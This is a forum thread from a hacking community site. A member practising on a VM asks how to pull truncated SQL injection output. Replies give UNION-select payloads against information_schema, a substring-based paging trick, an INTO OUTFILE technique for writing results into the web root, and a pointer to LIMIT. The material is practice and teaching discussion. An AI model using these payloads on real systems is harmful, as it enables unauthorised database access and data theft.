Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

SQL injection in limited space


Thorin's Avatar
Member
0 2

This might seem like a noob question. I am currently trying SQL injection on a VM. This is what i am trying markupunion select group_concat(table_name) from information_schema.tables# And the injection works. But the page that is returned is an xml file and each tag has a size limitation, so I can see only half of the results.

<title>Bla Forum - Topic:  CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,columns_priv,db,func,help_category,help_keyword,help_relation,help_topic,host,proc,procs_priv,tables_pri </title>

Is there a way to print the second half of the results. The table that i need to see contains the word "user". If I'm too ambiguous I want to do something along the lines of:

  1. Arrange the rows of the result and then group_concat it
  2. Slice the result (as in string[10:])
  3. Select all the rows after tables_priv

What I already tried: markupunion select group_concat(table_name) from information_schema.tables where table_name regexp 'user'# Nothing is printed out. But this query works when i directly try in the VM's mysql (after omitting the 'union' and the '#'). markupunion select group_concat(table_name) from information_schema.tables where table_name like 'user'# Didn't work on neither the web application nor directly in VM's mysql.

PS. I know sqlmap will do the job for me, but i want to try things manually.


skeet's Avatar
Member
0 0

If you know the current working directory or a directory you have access to try to put the output into a text file with

INTO OUTFILE '/path/where/you/can/read/write/query.txt'


Thorin's Avatar
Member
0 2

I don't have access to the file system (from the hacker's perspective .. meaning no LFI vulnerabilities) … Anyways i just solved the question. I used the following payload:

markupunion select substring(group_concat(table_name),341,341) from information_schema.tables#;


Thorin's Avatar
Member
0 2

skeet wrote: If you know the current working directory or a directory you have access to try to put the output into a text file with

INTO OUTFILE '/path/where/you/can/read/write/query.txt'

Taking into consideration what you're saying. Since I don't have an LFI or directory traversal vulnerability, I can use SQL injection to read a particular file on the file system. So if I dump the output of the initial injection into a file and then read it using another sql injection, won't that lead me to the same place (size limitations). Won't work in this situation but certainly something to try on another machine :)


skeet's Avatar
Member
0 0

Thorin wrote: [quote]skeet wrote: If you know the current working directory or a directory you have access to try to put the output into a text file with

INTO OUTFILE '/path/where/you/can/read/write/query.txt'

Taking into consideration what you're saying. Since I don't have an LFI or directory traversal vulnerability, I can use SQL injection to read a particular file on the file system. So if I dump the output of the initial injection into a file and then read it using another sql injection, won't that lead me to the same place (size limitations). Won't work in this situation but certainly something to try on another machine :)[/quote]

I was thinking more along the lines of executing the query with INTO OUTFILE '/var/www/html/results.txt' then just checking with your browser at http://www.whatever.com/results.txt Either way glad you solved your problem :D


Huitzilopochtli's Avatar
....
10 9

If there was no INTO OUTFILE available I'd just have used LIMIT.